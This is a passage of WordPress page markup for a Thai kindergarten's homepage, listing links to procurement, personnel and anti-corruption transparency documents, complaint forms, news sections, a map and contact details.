{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html 